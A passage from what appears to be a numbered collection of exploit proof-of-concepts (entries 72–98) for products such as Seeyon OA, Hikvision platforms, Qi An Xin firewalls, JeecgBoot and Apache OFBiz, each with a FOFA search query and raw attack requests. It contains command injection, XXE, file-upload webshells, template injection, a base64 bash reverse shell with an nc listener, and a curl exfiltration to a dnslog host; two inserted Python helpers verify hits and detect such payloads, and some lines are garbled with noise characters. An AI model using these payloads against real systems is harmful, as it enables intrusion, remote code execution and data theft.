User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

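The MSSQL PoCs for entries 57, 58 and 66 are error-based (the response leaks an MD5 the injected query computed) and those for 64, 68, 69 and 71 are time-based (WAITFOR DELAY). What follows is an added example, not code from the original post, of the two checks a verifier needs: computing the digest locally so the response can be searched for it, and deciding a timing hit without being fooled by jitter. SAMPLE_ERROR_PAGE and the timing samples are constructed; the function names are hypothetical.

```python
"""Verification helpers for the MSSQL injection PoCs above.

Added example, not part of the original post. SAMPLE_ERROR_PAGE and the timing
samples in __main__ are constructed for the demonstration.
"""
import hashlib
import re


def expected_md5_marker(seed: str) -> str:
    """Lowercase hex digest that HashBytes('MD5', seed) yields on the server.

    fn_varbintohexstr() and fn_sqlvarbasetostr() render it as '0x' + hex; the
    comparison with an int then fails and MSSQL echoes the string in its error
    ("Conversion failed when converting the varchar value '0x...' to data type int").
    """
    return hashlib.md5(seed.encode("ascii")).hexdigest()


def find_marker(response_body: str, seed: str) -> bool:
    """True when the response leaks the digest of seed, with or without the 0x prefix."""
    digest = expected_md5_marker(seed)
    return re.search(r"(?:0x)?" + digest, response_body, re.IGNORECASE) is not None


def time_based_hit(baseline: list, probe: list, delay: float, tolerance: float = 0.8) -> bool:
    """Decide whether the WAITFOR DELAY probes were really held for `delay` seconds.

    Every probe sample must exceed the slowest baseline sample by at least
    tolerance * delay, so one slow baseline request or one jittery probe cannot
    produce a false positive. Send the probe at least twice.
    """
    if not baseline or not probe:
        raise ValueError("need at least one baseline and one probe sample")
    threshold = max(baseline) + tolerance * delay
    return min(probe) >= threshold


# Constructed sample of the error page an entry-58 style request provokes.
SAMPLE_ERROR_PAGE = (
    "System.Data.SqlClient.SqlException: Conversion failed when converting the "
    "varchar value '0xe10adc3949ba59abbe56e057f20f883e' to data type int."
)

if __name__ == "__main__":
    print(find_marker(SAMPLE_ERROR_PAGE, "123456"))
    print(expected_md5_marker("102103122"))  # compare with the string entry 66 looks for
    print(time_based_hit([0.21, 0.19, 0.25], [5.3, 5.2, 5.4], delay=5))
    print(time_based_hit([0.21, 0.19, 0.25], [5.3, 0.9], delay=5))
```

Search the whole response rather than fixed line numbers: the error text moves with the page layout, while the digest does not.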
72. Seeyon (致远) OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
xmlValue decodes to a DOCTYPE that declares an external entity pointing at file:///c:/windows/win.ini and references it from the VALUE field.
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. Seeyon (致远) M3-Server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then fetch the command output:

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. Newcapec (新开普) campus mobile service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
The UnitCode value is a FreeMarker template: the ?new() built-in instantiates freemarker.template.utility.Execute, which runs the string it is given as an OS command.
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}",
}

Then fetch the marker file:

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 garment management software UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

Then verify:

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE (百为) traffic-control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀 (Suda Tianyao) software DesignReportSave.jsp arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

Then verify:

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. Uniview (宇视科技) video surveillance main-cgi password disclosure
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 (Sifudi) LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

3 Q t3 m5 s4 H8 D" x85. SysAid On-premise< 23.3.36远程代码执行( ]% ?! o, l# W3 M
CVE-2023-47246/ Z7 p1 w7 t6 X% |& G; c
FOFA:body="sysaid-logo-dark-green.png"
' Y; \8 U6 r( ?EXP数据包如下,注入哥斯拉马
% g* R% E Q$ k4 ~% w$ q5 rPOST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
2 l; C( Q7 S& _* ?Host: x.x.x.x: L( Q7 P1 O4 o
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15, A8 N r1 y" O5 b9 Z! R; Y1 I% o
Content-Type: application/octet-stream0 g( u; j2 j" H. G8 C5 f' `" c" r
Accept-Encoding: gzip: ~' a9 t; Q) U8 h" G1 {6 V; G
$ }' l- l) o4 C3 lPAYLOAD
- t' p0 I3 W% J( A
4 P; N6 G7 w, i" t) H回显URL:http://x.x.x.x/userfiles/index.jsp9 ]" U9 p. X0 }9 y9 l9 f
# y* c" v/ \+ Z! V
86. Tosei (Japan) self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. DBAPPSecurity (安恒) Mingyu (明御) security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

The file is then reachable at /jfhatuwe.php

88. DBAPPSecurity (安恒) Mingyu (明御) security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

The type parameter decodes to a newline-delimited shell command that appends <?php echo "assdwdmpidmsbzoabahpjhnokiduw"; phpinfo(); ?> to /usr/local/webui/txzfsrur.php; then request /txzfsrur.php.

89. Seeyon (致远互联) FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
The path ends in .js%70, which only becomes .jsp after a filter matching on the raw extension has run; a vulnerable target returns 24642 (111*222) in the response.
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. Hikvision (海康威视) IP network intercom/broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. Hikvision (海康威视) integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
The ..; segment is a Tomcat path-parameter trick: the container normalises it to .. and dispatches /center/api/orgManage/v1/orgs/download, while a front-end check that matches on the raw path sees /center/api/task/.
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. Hikvision (海康威视) operations management center session command execution
Fastjson deserialization command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

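Entries 56, 72, 76, 84 and 92 share a pattern: a structured request body whose content either picks a class for the server to instantiate (__type for .NET serializers, @type for Fastjson), embeds a FreeMarker directive, or declares an external entity. Below is an added example, not code from the original post, of a request-body inspector that a WAF rule or a log-replay job could use. It is fed the bodies of entries 56, 76 and 84 (commands trimmed to id) and a shortened entry-72 body, all constructed inline; DANGEROUS_TYPES is an illustrative denylist assumed for the demonstration, and the function names are hypothetical.

```python
"""Inspect a request body for the deserialization, template-injection and XXE
markers that entries 56, 72, 76, 84 and 92 rely on.

Added example, not part of the original post. It handles the two body encodings
those entries use (JSON and application/x-www-form-urlencoded). DANGEROUS_TYPES
is a short illustrative denylist, not a complete gadget catalogue.
"""
import json
import re
from urllib.parse import parse_qsl

# Keys through which Json.NET / JavaScriptSerializer ("__type", "$type") and
# Fastjson ("@type") let the sender choose the runtime class.
TYPE_KEYS = {"__type", "$type", "@type"}

# The chain from entry 56 plus two well-known Fastjson JNDI gadgets (assumed list).
DANGEROUS_TYPES = {
    "System.Windows.Data.ObjectDataProvider",
    "System.Diagnostics.Process",
    "System.Diagnostics.ProcessStartInfo",
    "com.sun.rowset.JdbcRowSetImpl",
    "org.apache.tomcat.dbcp.dbcp2.BasicDataSource",
}

# <#assign x="freemarker.template.utility.Execute"?new()>, with or without JSON escaping.
FREEMARKER_NEW = re.compile(
    r'<#assign\s+\w+\s*=\s*\\?"freemarker\.[\w.]+\\?"\s*\?new\s*\(', re.IGNORECASE
)
# <!ENTITY name SYSTEM "..."> or PUBLIC: an external entity declaration.
XXE_ENTITY = re.compile(r"<!ENTITY\s+\S+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE)


def _walk(node, path, findings):
    """Recursively visit a decoded body, appending 'path: reason' strings."""
    if isinstance(node, dict):
        for key, value in node.items():
            if key in TYPE_KEYS and isinstance(value, str):
                cls = value.split(",", 1)[0].strip()  # "Type, Assembly, Version=..." -> "Type"
                if cls in DANGEROUS_TYPES:
                    findings.append(f"{path}.{key}: gadget type {cls}")
            _walk(value, f"{path}.{key}", findings)
    elif isinstance(node, list):
        for index, item in enumerate(node):
            _walk(item, f"{path}[{index}]", findings)
    elif isinstance(node, str):
        if FREEMARKER_NEW.search(node):
            findings.append(f"{path}: FreeMarker ?new() directive")
        if XXE_ENTITY.search(node):
            findings.append(f"{path}: external entity declaration")


def inspect_body(content_type: str, body: str) -> list:
    """Return a list of findings; an empty list means nothing matched."""
    findings = []
    if "json" in content_type.lower():
        try:
            _walk(json.loads(body), "$", findings)
        except json.JSONDecodeError:
            # Fastjson and Json.NET accept input the strict parser rejects (for example
            # the trailing comma in entry 76), so fall back to scanning the raw text.
            _walk(body, "$", findings)
    elif "x-www-form-urlencoded" in content_type.lower():
        for key, value in parse_qsl(body, keep_blank_values=True):
            _walk(value, f"form.{key}", findings)
    else:
        _walk(body, "$", findings)
    return findings


# Constructed samples: the bodies of entries 56, 84 and 76 (commands trimmed) and a
# shortened entry-72 body.
SAMPLE_DOTNET = (
    '{"storeID":{"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, '
    'Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","MethodName":"Start",'
    '"ObjectInstance":{"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, '
    'Culture=neutral, PublicKeyToken=b77a5c561934e089","StartInfo":{"__type":'
    '"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, '
    'PublicKeyToken=b77a5c561934e089","FileName":"cmd","Arguments":"/c ping 6qevyvmi.dnslog.pw"}}}}'
)
SAMPLE_FREEMARKER_STRICT = (
    r'{"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"id\")}", "type": "0"}'
)
SAMPLE_FREEMARKER_LENIENT = (
    r'{"command": "GetFZinfo", "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"id\")}",}'
)
SAMPLE_XXE_FORM = (
    "S=ajaxColManager&M=colDelLock&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E"
    "%3C%21DOCTYPE+foo+%5B%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22%3E%5D%3E"
    "%3CSignature%3E%26xxe%3B%3C%2FSignature%3E"
)

if __name__ == "__main__":
    for label, ctype, sample in [
        ("entry 56", "application/json", SAMPLE_DOTNET),
        ("entry 84", "application/json", SAMPLE_FREEMARKER_STRICT),
        ("entry 76", "application/json", SAMPLE_FREEMARKER_LENIENT),
        ("entry 72", "application/x-www-form-urlencoded", SAMPLE_XXE_FORM),
    ]:
        print(label, inspect_body(ctype, sample))
```

The lenient fallback matters in practice: a detector that gives up on the first parse error would miss exactly the bodies that the permissive Java and .NET parsers still accept.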
" j6 a0 y( C1 T# b& q1 C93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
( ^# y. P! _% A0 b6 a& SFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
6 Q9 i% C# ^5 P5 W: M5 j2 YPOST /?g=app_av_import_save HTTP/1.1
) }: V4 U0 h8 R, h1 H$ ^/ ~0 e* aHost: x.x.x.x
& M8 \5 J& r/ _; C8 X E- qContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
, a- u# c0 N W) L PUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
6 n" h5 c; F4 q7 X8 b& j& o8 H2 g* s5 T8 ^: \; B0 y6 j
------WebKitFormBoundarykcbkgdfx1 f4 ?3 D' F2 D/ {+ H8 L( s7 P
Content-Disposition: form-data; name="MAX_FILE_SIZE"
6 L. P% w- J# E- l$ x: A/ I( f) T% Z! t ~8 I/ C
10000000; G' x3 ^) z3 a
------WebKitFormBoundarykcbkgdfx
5 v, \3 \9 G. Z) u* mContent-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"3 H- K9 g5 ^+ L: W5 Z0 g X
Content-Type: text/plain3 s1 X' P* _4 d" t& S, z% i
3 d4 }/ o6 ^: h3 f$ l. zwagletqrkwrddkthtulxsqrphulnknxa6 t) F9 G, I. B1 A
------WebKitFormBoundarykcbkgdfx# G! v1 _ Z: L8 L8 |
Content-Disposition: form-data; name="submit_post"
8 O/ V- Z+ \. I% [
" n ^) p9 l$ q F: h3 Uobj_app_upfile
& H; ?9 U. }# [) O7 w/ g( G------WebKitFormBoundarykcbkgdfx u9 g, @: h2 r' o% L
Content-Disposition: form-data; name="__hash__"; S" n6 d/ p( f' ]) v# y2 f
" d/ R3 u3 h9 l) ]' V' X" r4 v3 T
0b9d6b1ab7479ab69d9f71b05e0e9445
0 H9 X( q: L* Z& d/ R' M2 H$ J------WebKitFormBoundarykcbkgdfx--
, r" s' U2 e" n7 ]/ I' X4 A# R8 \5 G; ]' M
) Y. U+ s- x" ~. FGET /attachements/xlskxknxa.txt HTTP/1.1
/ T4 ?0 l# N* R4 ~" gHost: xx.xx.xx.xx3 S% U4 M3 V# Y0 T4 ?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
- [% e$ B# H) \( K9 a

94. Qi An Xin Wangshen SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache-OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the PoC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
